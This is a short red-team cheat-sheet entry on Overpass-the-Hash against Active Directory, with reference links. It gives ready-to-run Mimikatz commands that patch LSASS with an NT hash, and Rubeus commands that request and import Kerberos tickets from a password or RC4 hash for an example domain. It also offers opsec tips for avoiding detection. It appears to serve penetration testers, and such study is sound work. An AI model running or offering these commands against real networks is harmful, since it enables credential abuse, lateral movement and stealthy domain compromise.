Overpass-the-Hash

• https://unshade.tech/sacrificial-session

Mimikatz

• https://github.com/GhostPack/Rubeus#example-over-pass-the-hash

• https://s3cur3th1ssh1t.github.io/Named-Pipe-PTH/

Create a new process with dummy creds (Logon type 9), open the LSASS process and patch it with the supplied NT hash. This causes the normal Kerberos authentication process to kick off as normal as if the user had normally logged on, turning the supplied hash into a fully-fledged TGT:

Cmd > .\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::pth /user:snovvcrash /domain:megacorp.local /run:c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /ntlm:fc525c9683e8fe067095ba2ddc971889" "exit"

Rubeus

• https://github.com/GhostPack/Rubeus

• https://github.com/GhostPack/Rubeus#example-over-pass-the-hash

Create a sacrificial process (Logon type 9), legitimately ask Kerberos for TGT, import it and interact with the process (need elevated context):

Cmd > .\Rubeus.exe asktgt /domain:megacorp.local /dc:dc1 /user:snovvcrash /password:Passw0rd! /createnetonly:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /show
Cmd > .\Rubeus.exe asktgt /domain:megacorp.local /dc:dc1 /user:snovvcrash /rc4:fc525c9683e8fe067095ba2ddc971889 /createnetonly:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /show

Create a new process with dummy creds (Logon type 9) manually, then use Rubeus with user's NT hash to ask for a TGT and import it:

A more opsec safe approach is to use AES key (KeyType 0x12) instead of RC4-HMAC (KeyType 0x17) alongside with /opsec switch which instructs Rubeus not to do pre-auth (mimics standard Kerberos behavior):